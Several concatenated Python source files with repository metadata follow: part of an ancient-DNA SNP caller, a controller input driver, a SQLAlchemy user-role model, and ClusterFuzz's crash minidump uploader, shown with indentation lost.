f2.write(str(n_count[j]) + '\t' + str(ncount_c_five[j]) + '\t' + str(ncount_g_five[j]) + '\t' + str(ncount_other_five[j]) + '\t' + str(ncount_c2t_five[j]) + '\t' + str(ncount_g2a_five[j]) + '\t' +
str(ncount_c_three[j]) + '\t' + str(ncount_g_three[j]) + '\t' + str(ncount_other_three[j]) + '\t' + str(ncount_c2t_three[j]) + '\t' + str(ncount_g2a_three[j]) + '\n')
f2.close()
if options.snpcalling:
quality = options.quality
if options.allsite:
quality = 0.0
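# Diploid calling is delegated to AntCaller_snpcalling.py: the pileup is
# split into per-thread chunks, the workers run in parallel, and their VCF
# outputs are concatenated below. The haploid (ploidy 1) model is inline.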
if options.ploidy == 2:
fpileupname = wdpath + '/' + options.pileupfile
fpileup = open(fpileupname, 'r')
nline = 0
for line in fpileup:
if line[0] != '@':
nline += 1
fpileup.close()
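# chunk size (rounded up) so the split below yields at most options.thread files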
line_each = int(nline/options.thread) + 1
fpileup = open(fpileupname, 'r')
filenum = 1
filesplitname = wdpath + '/' + options.outputprefix + '.temporary.pileup.' + str(filenum)
filesplit = open(filesplitname, 'w')
linecount = 0
for line in fpileup:
if line[0] == '@':
continue
filesplit.write(line)
linecount += 1
if linecount == line_each:
filesplit.close()
filenum += 1
filesplitname = wdpath + '/' + options.outputprefix + '.temporary.pileup.' + str(filenum)
filesplit = open(filesplitname, 'w')
linecount = 0
filesplit.close()
fpileup.close()
if options.allsite:
def split2(para):
os.system('python AntCaller_snpcalling.py -f ' + options.outputprefix + '.temporary.pileup.' + str(para) + ' -d ' + options.damageinfo + ' -o ' + options.outputprefix + str(para) + ' -q ' + str(quality) + ' -a')
else:
def split2(para):
os.system('python AntCaller_snpcalling.py -f ' + options.outputprefix + '.temporary.pileup.' + str(para) + ' -d ' + options.damageinfo + ' -o ' + options.outputprefix + str(para) + ' -q ' + str(quality))
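# os.system blocks while the child runs and releases the GIL, so a plain
# ThreadPool is enough to fan the per-chunk callers out in parallel.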
pool = ThreadPool(options.thread)
pool.map(split2, range(1, options.thread + 1))
pool.close()
pool.join()
fvcfname = wdpath + '/' + options.outputprefix + '.vcf'
fvcf = open(fvcfname, 'w')
fvcf.write('#CHROM' + '\t' + 'POS' + '\t' + 'ID' + '\t' + 'REF' + '\t' + 'ALT' + '\t' + 'QUAL' + '\t' + 'FILTER' + '\t' + 'INFO' + '\t' + 'FORMAT' + '\t' + options.outputprefix + '\n')
for i in range(1, options.thread + 1):
f2splitname = wdpath + '/' + options.outputprefix + str(i) + '.vcf'
f2split = open(f2splitname, 'r')
for line in f2split:
fvcf.write(line)
f2split.close()
filesplitname = wdpath + '/' + options.outputprefix + '.temporary.pileup.' + str(i)  # same path used when the chunk was created
os.remove(f2splitname)
os.remove(filesplitname)
fvcf.close()
if options.ploidy == 1:
rr = 0.001
homo = (1 - rr)/2.0
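# rr and homo appear to be prior constants; neither is referenced again in
# this script, and the genotype posteriors computed below use a flat prior.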
FORMAT = 'GT:AD:DP:GQ:PL'
# estimate the position-specific substitution (damage) rates
fname = wdpath + '/' + options.damageinfo
f = open(fname, 'r')
c2t_rate = []
g2a_rate = []
for line in f:
col = line.split('\t')
if not col[0].isdigit():
continue
if int(col[0]) == 0:
break
if int(col[1]) != 0:
c2t_rate.append(float(col[4])/int(col[1]) + 0.0001)
else:
c2t_rate.append(0.0001)
if int(col[7]) != 0:
g2a_rate.append(float(col[10])/int(col[7]) + 0.0001)
else:
g2a_rate.append(0.0001)
f.close()
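# Position-specific damage rates from the damageinfo table:
# c2t_rate[i] = c2t_5end / c_5end at 5' offset i, and g2a_rate[i] =
# g2a_3end / g_3end at 3' offset i, each with a 1e-4 pseudocount so no
# rate is exactly zero.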
# convert a Phred+33 quality character into a base-call error probability
def error(b):
return pow(10.0, (33.0 - ord(b))/10.0)
# probability that the genotype at index p_in is wrong (sum of the other posteriors)
def prob_cal(p_in):
return sum(p_GD[:p_in]) + sum(p_GD[p_in+1:])
# return the index of element b in list a
def which(a, b):
for j in range(len(a)):
if a[j] == b:
return j
f1name = wdpath + '/' + options.pileupfile # read the pileup file
f1 = open(f1name, 'r')
f2name = wdpath + '/' + options.outputprefix + '.vcf'
f2 = open(f2name, 'w')
f2.write('#CHROM' + '\t' + 'POS' + '\t' + 'ID' + '\t' + 'REF' + '\t' + 'ALT' + '\t' + 'QUAL' + '\t' + 'FILTER' + '\t' + 'INFO' + '\t' + 'FORMAT' + '\t' + options.outputprefix + '\n')
# process each line of the pileup file
for line in f1:
if line.startswith('@'):
continue
col = line.split('\t')
chromosome = col[0]
position = col[1]
ref = col[2]
count = int(col[3])
if count < 2:
continue
Nt = col[4]
quals = col[5]
pos5 = col[6].split(',')
pos3 = col[7].split(',')
Mquals = col[8].split(',')
genotype = ['A', 'G', 'C', 'T']
A_count = 0
G_count = 0
C_count = 0
T_count = 0
p_A = 1
p_G = 1
p_C = 1
p_T = 1
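# Per-base error model: r combines the Phred base-call error, a fixed 0.001
# floor and the mapping error implied by the mapping quality; bases with
# r > 0.2 are skipped. p and q are the position-specific C->T (5') and
# G->A (3') damage rates; which one applies to a genotype term depends on
# the case of the pileup base, i.e. the strand of the supporting read.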
for n in range(count):
r = error(quals[n]) + 0.001 + 1.0/pow(10.0, int(Mquals[n])/10.0)
if r > 0.2:
continue
q = g2a_rate[int(pos3[n]) - 1]
p = c2t_rate[int(pos5[n]) - 1]
if Nt[n] == 'A' or Nt[n] == 'a':
A_count += 1
if Nt[n] == 'A':
p_A *= 1.0 - r
p_G *= (1.0 - r)*q + r*(1.0-q)/3.0
p_C *= r/3.0
p_T *= r/3.0
else:
p_A *= 1.0 - r
p_G *= p*(1.0 - r) + r*(1.0 - p)/3.0
p_C *= r/3.0
p_T *= r/3.0
elif Nt[n] == 'G' or Nt[n] == 'g':
G_count += 1
if Nt[n] == 'G':
p_A *= r/3.0
p_G *= (1.0 - q)*(1.0 - r) + r*q/3.0
p_C *= r/3.0
p_T *= r/3.0
else:
p_A *= r/3.0
p_G *= (1.0 - p)*(1.0 - r) + r*p/3.0
p_C *= r/3.0
p_T *= r/3.0
elif Nt[n] == 'C' or Nt[n] == 'c':
C_count += 1
if Nt[n] == 'C':
p_A *= r/3.0
p_G *= r/3.0
p_C *= (1.0 - p)*(1.0 - r) + r*p/3.0
p_T *= r/3.0
else:
p_A *= r/3.0
p_G *= r/3.0
p_C *= (1.0 - q)*(1.0 - r) + r*q/3.0
p_T *= r/3.0
elif Nt[n] == 'T' or Nt[n] == 't':
T_count += 1
if Nt[n] == 'T':
p_A *= r/3.0
p_G *= r/3.0
p_C *= p*(1.0 - r) + r*(1.0 - p)/3.0
p_T *= 1.0 - r
else:
p_A *= r/3.0
p_G *= r/3.0
p_C *= (1.0 - r)*q + r*(1.0-q)/3.0
p_T *= 1.0 - r
else:
continue
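# Normalize the four genotype likelihoods to posteriors (flat prior) and
# clamp exact zeros to a tiny positive value so the log10-based qualities
# below stay finite.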
p_DG = np.array([p_A, p_G, p_C, p_T])
p_GD = p_DG/sum(p_DG)
if 0 in p_GD:
for i in range(len(p_GD)):
if p_GD[i] == 0:
p_GD[i] = 1.000000000000017e-308
max_pos = p_GD.argmax()
alt = genotype[max_pos]
count_list = np.array([A_count, G_count, C_count, T_count])
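# Emit VCF records: with options.allsite every site is written (reference
# calls get ALT='.' and a haploid GT of 0); otherwise only non-reference
# calls whose quality clears the cutoff are kept.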
if options.allsite:
if ref == alt:
ALT = '.'
Qual = round(-10.0 * math.log(prob_cal(max_pos), 10.0), 2)
INFO = 'AC=0;AF=0.00;AN=1;DP=' + str(count)
PL = int(round(-10.0*math.log(p_GD[max_pos], 10.0)))
Sample1 = '0:' + str(count_list[max_pos]) + ',' + str(sum(count_list) - count_list[max_pos]) + ':' + str(count) + ':' + str(Qual) + ':' + str(PL)
f2.write(chromosome + '\t' + position + '\t' + '.' + '\t' + ref + '\t' + ALT + '\t' + str(Qual) + '\t' + '.' + '\t' + INFO + '\t' + FORMAT + '\t' + Sample1 + '\n')
else:
ALT = alt
Qual = round(-10.0 * math.log(p_GD[which(genotype, ref)], 10.0), 2)
INFO = 'AC=1;AF=1.00;AN=1;DP=' + str(count)
PL = str(int(round(-10.0*math.log(p_GD[which(genotype, ref)], 10.0)))) + ',' + str(int(round(-10.0*math.log(p_GD[which(genotype, alt)], 10.0))))
Sample1 = '1:' + str(count_list[which(genotype, ref)]) + ',' + str(sum(count_list) - count_list[which(genotype, ref)]) + ':' + str(count) + ':' + str(Qual) + ':' + str(PL)
f2.write(chromosome + '\t' + position + '\t' + '.' + '\t' + ref + '\t' + ALT + '\t' + str(Qual) + '\t' + '.' + '\t' + INFO + '\t' + FORMAT + '\t' + Sample1 + '\n')
elif ref != alt:
Qual = round(-10.0 * math.log(p_GD[which(genotype, ref)], 10.0), 2)
if Qual < quality:
continue
ALT = alt
INFO = 'AC=1;AF=1.00;AN=1;DP=' + str(count)
PL = str(int(round(-10.0*math.log(p_GD[which(genotype, ref)], 10.0)))) + ',' + str(int(round(-10.0*math.log(p_GD[which(genotype, alt)], 10.0))))
Sample1 = '1:' + str(count_list[which(genotype, ref)]) + ',' + str(sum(count_list) - count_list[which(genotype, ref)]) + ':' + str(count) + ':' + str(Qual) + ':' + str(PL)
f2.write(chromosome + '\t' + position + '\t' + '.' + '\t' + ref + '\t' + ALT + '\t' + str(Qual) + '\t' + '.' + '\t' + INFO + '\t' + FORMAT + '\t' + Sample1 + '\n')
f2.close()
pileuppath = wdpath + '/' + options.pileupfile  # use the same wdpath-prefixed path the pileup was written to
if os.path.exists(pileuppath):
os.remove(pileuppath)
|
BoyanZhou/AntCaller
|
AntCaller-1.1.py
|
Python
|
gpl-3.0
| 19,523
|
__author__ = 'Andy'
from whirlybird.protocols import pilot_input_pb2
class InputDriverBase(object):
def __init__(self, transport):
self.transport = transport
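# _to_integer maps a normalized axis value onto the protobuf's integer range:
# -1.0 -> 0, 0.0 -> 255, 1.0 -> 510 (assuming callers pass values in [-1.0, 1.0]).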
def _to_integer(self, value):
return int(value * 255 + 255)
def emit(self,
left_stick_x,
left_stick_y,
right_stick_y,
right_stick_x,
triggers):
to_emit = pilot_input_pb2.PilotInput()
to_emit.left_stick_x = self._to_integer(left_stick_x)
to_emit.left_stick_y = self._to_integer(left_stick_y)
to_emit.right_stick_y = self._to_integer(right_stick_y)
to_emit.right_stick_x = self._to_integer(right_stick_x)
to_emit.triggers = self._to_integer(triggers)
# print('LX: {}, LY: {}, RX: {}, RY: {}, Trigger: {}'. format(to_emit.left_stick_x,
# to_emit.left_stick_y,
# to_emit.right_stick_x,
# to_emit.right_stick_y,
# to_emit.triggers))
self.transport.emit(to_emit.SerializeToString())
|
levisaya/whirlybird
|
whirlybird/client/input_drivers/input_driver_base.py
|
Python
|
mit
| 1,271
|
from sqlalchemy import Column, String, Integer
from BusTrack.repository import Base, session
from BusTrack.repository.models import STRING_LEN_SMALL
class UserType(Base):
__tablename__ = 'user_type'
id = Column(Integer, primary_key=True)
role_name = Column(String(STRING_LEN_SMALL))
@staticmethod
def __create_default_role__():
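"""Seed the user_type table with the default roles (Driver, Parent, Admin).
Does nothing if any UserType rows already exist."""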
if session.query(UserType).count() != 0:
return
driver = UserType()
driver.role_name = 'Driver'
parent = UserType()
parent.role_name = 'Parent'
admin = UserType()
admin.role_name = 'Admin'
session.add(driver)
session.add(parent)
session.add(admin)
session.commit()
session.close()
|
Rjtsahu/School-Bus-Tracking
|
BusTrack/repository/models/UserType.py
|
Python
|
gpl-3.0
| 743
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Crash minidump and symbols uploader."""
import email
import os
import re
import tempfile
import requests
from clusterfuzz._internal.base import utils
from clusterfuzz._internal.build_management import revisions
from clusterfuzz._internal.crash_analysis.stack_parsing import stack_parser
from clusterfuzz._internal.datastore import data_handler
from clusterfuzz._internal.datastore import data_types
from clusterfuzz._internal.google_cloud_utils import blobs
from clusterfuzz._internal.metrics import logs
from clusterfuzz._internal.platforms.android import adb
from clusterfuzz._internal.platforms.android import constants
from clusterfuzz._internal.protos import process_state_pb2
from clusterfuzz._internal.system import environment
from clusterfuzz._internal.system import process_handler
CRASH_REPORT_UPLOAD_URL = {
'staging': 'https://clients2.google.com/cr/staging_report',
'prod': 'https://clients2.google.com/cr/report',
}
BOT_ID_KEY = 'botId'
CF_ID_KEY = 'clusterfuzzId'
CRASH_DUMP_PATH_MARKER = 'Output crash dump:'
PRODUCT_KEY = 'product'
PRODUCT_MAP = {
'ANDROID': 'Chrome_Android',
'LINUX': 'Chrome_Linux',
'MAC': 'Chrome_Mac',
'WINDOWS': 'Chrome',
}
PROCESSED_REPORT_FILE_KEY = 'processedReport'
MINIDUMP_FILE_KEY = 'upload_file_minidump'
VERSION_KEY = 'version'
def post_with_retries(upload_url, params, files):
"""Perform HTTP POST request to given upload url with provided params."""
retry_limit = environment.get_value('FAIL_RETRIES')
for _ in range(retry_limit):
try:
result = requests.post(upload_url, data=params, files=files)
if result.status_code == requests.codes.ok:
return result.text
# No need to retry on a non-200 status code.
logs.log_error(
'Failed to upload request, error code %d.' % result.status_code)
return None
except Exception:
# To catch cases like connection error, timeout error, etc.
logs.log_warn('Failed to upload request, retrying.')
logs.log_error('Could not upload request after retries.')
return None
class FileMetadataInfo(object):
"""Handles file metadata for e.g. minidumps and processed reports."""
def __init__(self, path=None, key=None, contents=None):
self._path = path
self._key = key
self._contents = contents
@property
def path(self):
return self._path
@path.setter
def path(self, local_path):
self._path = local_path
@property
def key(self):
return self._key
@key.setter
def key(self, key):
self._key = key
@property
def contents(self):
return self._contents
@contents.setter
def contents(self, contents):
self._contents = contents
def get_file_handle(self):
"""Return file handle to metadata contents. Prefer to use blobstore key if
available, otherwise raw contents."""
if self.key:
contents = blobs.read_key(self.key)
elif self.contents:
contents = self.contents
else:
# No bot-independent file for which to get a file handle. Let the caller
# handle any errors.
return None
metadata_file = tempfile.TemporaryFile()
metadata_file.write(contents)
metadata_file.seek(0)
return metadata_file
class CrashReportInfo(object):
"""Stores the data collected from a run (via stacktrace or other) to be
used in uploading to Chromecrash."""
def __init__(self,
minidump_path=None,
minidump_contents=None,
minidump_key=None,
product=None,
version=None,
optional_params=None,
unsymbolized_stacktrace=None,
symbolized_stacktrace=None,
testcase_id=None,
bot_id=None,
serialized_crash_stack_frames=None):
self._minidump_info = FileMetadataInfo(
path=minidump_path, contents=minidump_contents, key=minidump_key)
self._minidump_path = minidump_path
self._product = product
self._version = version
if optional_params is None:
self._optional_params = {}
else:
self._optional_params = optional_params
self._unsymbolized_stacktrace = unsymbolized_stacktrace
self._symbolized_stacktrace = symbolized_stacktrace
self._testcase_id = testcase_id
self._bot_id = bot_id
self._serialized_crash_stack_frames = serialized_crash_stack_frames
@property
def minidump_info(self):
return self._minidump_info
@minidump_info.setter
def minidump_info(self, minidump_info):
self._minidump_info = minidump_info
@property
def product(self):
return self._product
@product.setter
def product(self, product):
self._product = product
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def optional_params(self):
return self._optional_params
@optional_params.setter
def optional_params(self, params):
self._optional_params = params
@property
def unsymbolized_stacktrace(self):
return self._unsymbolized_stacktrace
@unsymbolized_stacktrace.setter
def unsymbolized_stacktrace(self, stacktrace):
self._unsymbolized_stacktrace = stacktrace
@property
def symbolized_stacktrace(self):
return self._symbolized_stacktrace
@symbolized_stacktrace.setter
def symbolized_stacktrace(self, stacktrace):
self._symbolized_stacktrace = stacktrace
@property
def testcase_id(self):
return self._testcase_id
@testcase_id.setter
def testcase_id(self, testcase_id):
self._testcase_id = testcase_id
@property
def bot_id(self):
return self._bot_id
@bot_id.setter
def bot_id(self, bot_id):
self._bot_id = bot_id
@property
def serialized_crash_stack_frames(self):
return self._serialized_crash_stack_frames
@serialized_crash_stack_frames.setter
def serialized_crash_stack_frames(self, serialized_crash_stack_frames):
self._serialized_crash_stack_frames = serialized_crash_stack_frames
def upload(self):
"""Upload the minidump represented by self, with any other params to send
along with the POST request."""
if self.product is None or self.version is None:
logs.log_error('Missing product/version info, cannot upload.')
return None
report_file = FileMetadataInfo(
contents=self.serialized_crash_stack_frames).get_file_handle()
if report_file is None:
logs.log_warn('Missing processed report, falling back to minidump.')
# Get minidump if there is one, but don't worry if there isn't. Just having
# a report file is fine.
minidump_file = self.minidump_info.get_file_handle()
if report_file is None and minidump_file is None:
logs.log_error('Neither processed report nor minidump, nothing to '
'upload.')
return None
# Build the upload parameters.
params = {}
params[PRODUCT_KEY] = self.product
params[VERSION_KEY] = self.version
if self.testcase_id is not None:
params[CF_ID_KEY] = self.testcase_id
if self.bot_id is not None:
params[BOT_ID_KEY] = self.bot_id
files = {}
if report_file is not None:
files[PROCESSED_REPORT_FILE_KEY] = report_file
if minidump_file is not None:
files[MINIDUMP_FILE_KEY] = minidump_file
# Send off the report, returning the report ID.
mode = environment.get_value('UPLOAD_MODE')
if not mode or mode not in CRASH_REPORT_UPLOAD_URL:
logs.log_warn(
'Missing or unknown mode (%s); uploading to staging.' % str(mode))
mode = 'staging'
return post_with_retries(CRASH_REPORT_UPLOAD_URL[mode], params, files)
def store_minidump(self):
"""Store the crash minidump in appengine and return key."""
if not self.minidump_info.path:
return ''
minidump_key = ''
logs.log('Storing minidump (%s) in blobstore.' % self.minidump_info.path)
try:
with open(self.minidump_info.path, 'rb') as file_handle:
minidump_key = blobs.write_blob(file_handle)
except:
logs.log_error('Failed to store minidump.')
if minidump_key:
self.minidump_info = FileMetadataInfo(
path=self.minidump_info.path, key=minidump_key)
return minidump_key
def to_report_metadata(self):
"""Export to ReportMetadata for batching upload."""
return data_types.ReportMetadata(
product=self.product,
version=str(self.version),
minidump_key=self.minidump_info.key,
serialized_crash_stack_frames=self.serialized_crash_stack_frames,
testcase_id=str(self.testcase_id),
bot_id=str(self.bot_id))
def crash_report_info_from_metadata(report_metadata):
"""Return CrashReportInfo given ReportMetadata for uploading."""
return CrashReportInfo(
product=report_metadata.product,
version=report_metadata.version,
minidump_key=report_metadata.minidump_key,
serialized_crash_stack_frames=(
report_metadata.serialized_crash_stack_frames),
testcase_id=(report_metadata.testcase_id or None),
bot_id=(report_metadata.bot_id or None))
def parse_mime_to_crash_report_info(local_minidump_mime_path):
"""Read the (local) minidump MIME file into a CrashReportInfo object."""
# Get the minidump name and path.
minidump_path_match = re.match(r'(.*)\.mime', local_minidump_mime_path)
if minidump_path_match is None:
logs.log_error('Minidump filename in unexpected format: \'%s\'.' %
local_minidump_mime_path)
return None
minidump_path = '%s.dmp' % minidump_path_match.group(1).strip()
# The MIME file has no top-level Content-Type header; read the boundary from
# its first line and prepend a proper header (re-adding the consumed boundary
# line) so the email module can parse it.
with open(local_minidump_mime_path, 'rb') as minidump_mime_file_content:
# The boundary is the first line after the first two dashes.
boundary = minidump_mime_file_content.readline().strip()[2:]
minidump_mime_bytes = (
b'Content-Type: multipart/form-data; boundary=\"%s\"\r\n--%s\r\n' %
(boundary, boundary))
minidump_mime_bytes += minidump_mime_file_content.read()
minidump_mime_contents = email.message_from_bytes(minidump_mime_bytes)
# Parse the MIME contents, extracting the parameters needed for upload.
mime_key_values = {}
for mime_part in minidump_mime_contents.get_payload():
if isinstance(mime_part, str):
mime_part = utils.decode_to_unicode(mime_part)
logs.log_error('Unexpected str mime_part from mime path %s: %s' %
(local_minidump_mime_path, mime_part))
continue
part_descriptor = list(mime_part.values())
key_tokens = part_descriptor[0].split('; ')
key_match = re.match(r'name="(.*)".*', key_tokens[1])
# Extract from the MIME part the key-value pairs used by report uploading.
if key_match is not None:
report_key = key_match.group(1)
report_value = mime_part.get_payload(decode=True)
if report_key == MINIDUMP_FILE_KEY:
utils.write_data_to_file(report_value, minidump_path)
else:
# Take care of aliases.
if report_key in ('prod', 'buildTargetId'):
report_key = PRODUCT_KEY
elif report_key == 'ver':
report_key = VERSION_KEY
# Save the key-value pair.
mime_key_values[report_key] = report_value
# Pull out product and version explicitly since these are required
# for upload.
product, version = None, None
if PRODUCT_KEY in mime_key_values:
product = mime_key_values.pop(PRODUCT_KEY).decode('utf-8')
else:
logs.log_error(
'Could not find \'%s\' or alias in mime_key_values key.' % PRODUCT_KEY)
if VERSION_KEY in mime_key_values:
version = mime_key_values.pop(VERSION_KEY).decode('utf-8')
else:
logs.log_error(
'Could not find \'%s\' or alias in mime_key_values key.' % VERSION_KEY)
# If missing, return None and log keys that do exist; otherwise, construct
# CrashReportInfo and return.
if product is None or version is None:
logs.log_error(
'mime_key_values dict keys:\n%s' % str(list(mime_key_values.keys())))
return None
return CrashReportInfo(
minidump_path=minidump_path,
product=product,
version=version,
optional_params=mime_key_values)
def get_crash_info(output):
"""Parse crash output to get (local) minidump path and any other information
useful for crash uploading, and store in a CrashReportInfo object."""
crash_stacks_directory = environment.get_value('CRASH_STACKTRACES_DIR')
output_lines = output.splitlines()
num_lines = len(output_lines)
is_android = environment.is_android()
for i, line in enumerate(output_lines):
if is_android:
# If we are on Android, the dump extraction is more complicated.
# The location placed in the crash-stacktrace is of the dump itself but
# in fact only the MIME of the dump exists, and will have a different
# extension. We need to pull the MIME and process it.
match = re.match(CRASH_DUMP_PATH_MARKER, line)
if not match:
continue
minidump_mime_filename_base = None
for j in range(i + 1, num_lines):
line = output_lines[j]
match = re.match(r'(.*)\.dmp', line)
if match:
minidump_mime_filename_base = os.path.basename(match.group(1).strip())
break
if not minidump_mime_filename_base:
logs.log_error('Minidump marker was found, but no path in stacktrace.')
return None
# Look for MIME. If none found, bail.
# We might not have copied over the crash dumps yet (copying is buffered),
# so we want to search both the original directory and the one to which
# the minidumps should later be copied.
device_directories_to_search = [
constants.CRASH_DUMPS_DIR,
os.path.dirname(line.strip())
]
device_minidump_search_paths = []
device_minidump_mime_path = None
for device_directory in device_directories_to_search:
device_minidump_mime_potential_paths = adb.run_shell_command(
['ls', '"%s"' % device_directory], root=True).splitlines()
device_minidump_search_paths += device_minidump_mime_potential_paths
for potential_path in device_minidump_mime_potential_paths:
# Check that we actually found a file, and the right one (not logcat).
if 'No such file or directory' in potential_path:
continue
if minidump_mime_filename_base not in potential_path:
continue
if '.up' in potential_path or '.dmp' in potential_path:
device_minidump_mime_path = os.path.join(device_directory,
potential_path)
break
# Break if we found a path.
if device_minidump_mime_path is not None:
break
# If we still didn't find a minidump path, bail.
if device_minidump_mime_path is None:
logs.log_error('Could not get MIME path from ls:\n%s' %
str(device_minidump_search_paths))
return None
# Pull out MIME and parse to minidump file and MIME parameters.
minidump_mime_filename = '%s.mime' % minidump_mime_filename_base
local_minidump_mime_path = os.path.join(crash_stacks_directory,
minidump_mime_filename)
adb.run_command([
'pull',
'"%s"' % device_minidump_mime_path, local_minidump_mime_path
])
if not os.path.exists(local_minidump_mime_path):
logs.log_error('Could not pull MIME from %s to %s.' %
(device_minidump_mime_path, local_minidump_mime_path))
return None
crash_info = parse_mime_to_crash_report_info(local_minidump_mime_path)
if crash_info is None:
return None
crash_info.unsymbolized_stacktrace = output
return crash_info
# Other platforms are not currently supported.
logs.log_error('Unable to fetch crash information for this platform.')
return None
# Could not find dump location, bail out. This could also happen when we don't
# have a minidump location in stack at all, e.g. when testcase does not crash
# during minimization.
return None
def get_crash_info_and_stacktrace(application_command_line, crash_stacktrace,
gestures):
"""Return crash minidump location and updated crash stacktrace."""
app_name_lower = environment.get_value('APP_NAME').lower()
retry_limit = environment.get_value('FAIL_RETRIES')
using_android = environment.is_android()
using_chrome = 'chrome' in app_name_lower or 'chromium' in app_name_lower
warmup_timeout = environment.get_value('WARMUP_TIMEOUT', 90)
# Minidump generation is only applicable on Chrome application.
# FIXME: Support minidump generation on platforms other than Android.
if not using_chrome or not using_android:
return None, crash_stacktrace
# Get the crash info from stacktrace.
crash_info = get_crash_info(crash_stacktrace)
# If we lost the minidump file, we need to recreate it.
# Note that because of the way crash_info is generated now, if we have a
# non-None crash_info, we should also have its minidump path; we insert
# the check to safeguard against possibly constructing the crash_info in
# other ways in the future that might potentially lose the minidump path.
if not crash_info or not crash_info.minidump_info.path:
for _ in range(retry_limit):
_, _, output = (
process_handler.run_process(
application_command_line,
timeout=warmup_timeout,
gestures=gestures))
crash_info = get_crash_info(output)
if crash_info and crash_info.minidump_info.path:
crash_stacktrace = utils.decode_to_unicode(output)
break
if not crash_info or not crash_info.minidump_info.path:
# We could not regenerate a minidump for this crash.
logs.log('Unable to regenerate a minidump for this crash.')
return crash_info, crash_stacktrace
def get_symbolized_stack_bytes(crash_type, crash_address, symbolized_stack):
"""Get bytes for symbolized crash proto."""
# FIXME: For some tests, crash_address is literally 'address'.
crash_address = stack_parser.format_address_to_dec(crash_address)
if crash_address is None:
# Instead of ignoring such reports, we pass 0xDEADBEEF address.
# Crash address is not applicable to many crash types (e.g. CHECK failures,
# MSan and UBSan crashes).
crash_address = 0xDEADBEEF
# TODO(jchinlee): Add os[_info] and cpu[_info] in form crash/ expects.
process_state = process_state_pb2.ProcessStateProto(
crash=process_state_pb2.ProcessStateProto.Crash(
reason=crash_type,
address=stack_parser.unsigned_to_signed(crash_address)),
requesting_thread=0,
)
try:
for stack in symbolized_stack:
thread = process_state.threads.add()
thread.frames.extend([stackframe.to_proto() for stackframe in stack])
return process_state.SerializeToString()
except Exception as e:
logs.log_error(
'Failed to get proto for crash:\n'
'Error: %s\n'
'Type: %s\n'
'Address: %s\n'
'Stack:\n%s\n' % (e, crash_type, crash_address, symbolized_stack))
return None
def save_crash_info_if_needed(testcase_id, crash_revision, job_type, crash_type,
crash_address, crash_frames):
"""Saves crash report for chromium project, skip otherwise."""
if data_handler.get_project_name(job_type) != 'chromium':
return None
serialized_crash_stack_frames = get_symbolized_stack_bytes(
crash_type, crash_address, crash_frames)
if not serialized_crash_stack_frames:
return None
crash_info = CrashReportInfo(
serialized_crash_stack_frames=serialized_crash_stack_frames)
# Get product and version (required).
platform = environment.platform()
crash_info.product = PRODUCT_MAP[platform]
crash_info.version = revisions.get_real_revision(
crash_revision, job_type, display=True)
# Update crash_info object with bot information and testcase id.
crash_info.bot_id = environment.get_value('BOT_NAME')
crash_info.testcase_id = int(testcase_id)
# Store CrashInfo metadata.
crash_report_metadata = crash_info.to_report_metadata()
crash_report_metadata.job_type = job_type
crash_report_metadata.crash_revision = crash_revision
crash_report_metadata.put()
logs.log('Created crash report entry for testcase %s.' % testcase_id)
return crash_info
|
google/clusterfuzz
|
src/clusterfuzz/_internal/chrome/crash_uploader.py
|
Python
|
apache-2.0
| 21,137
|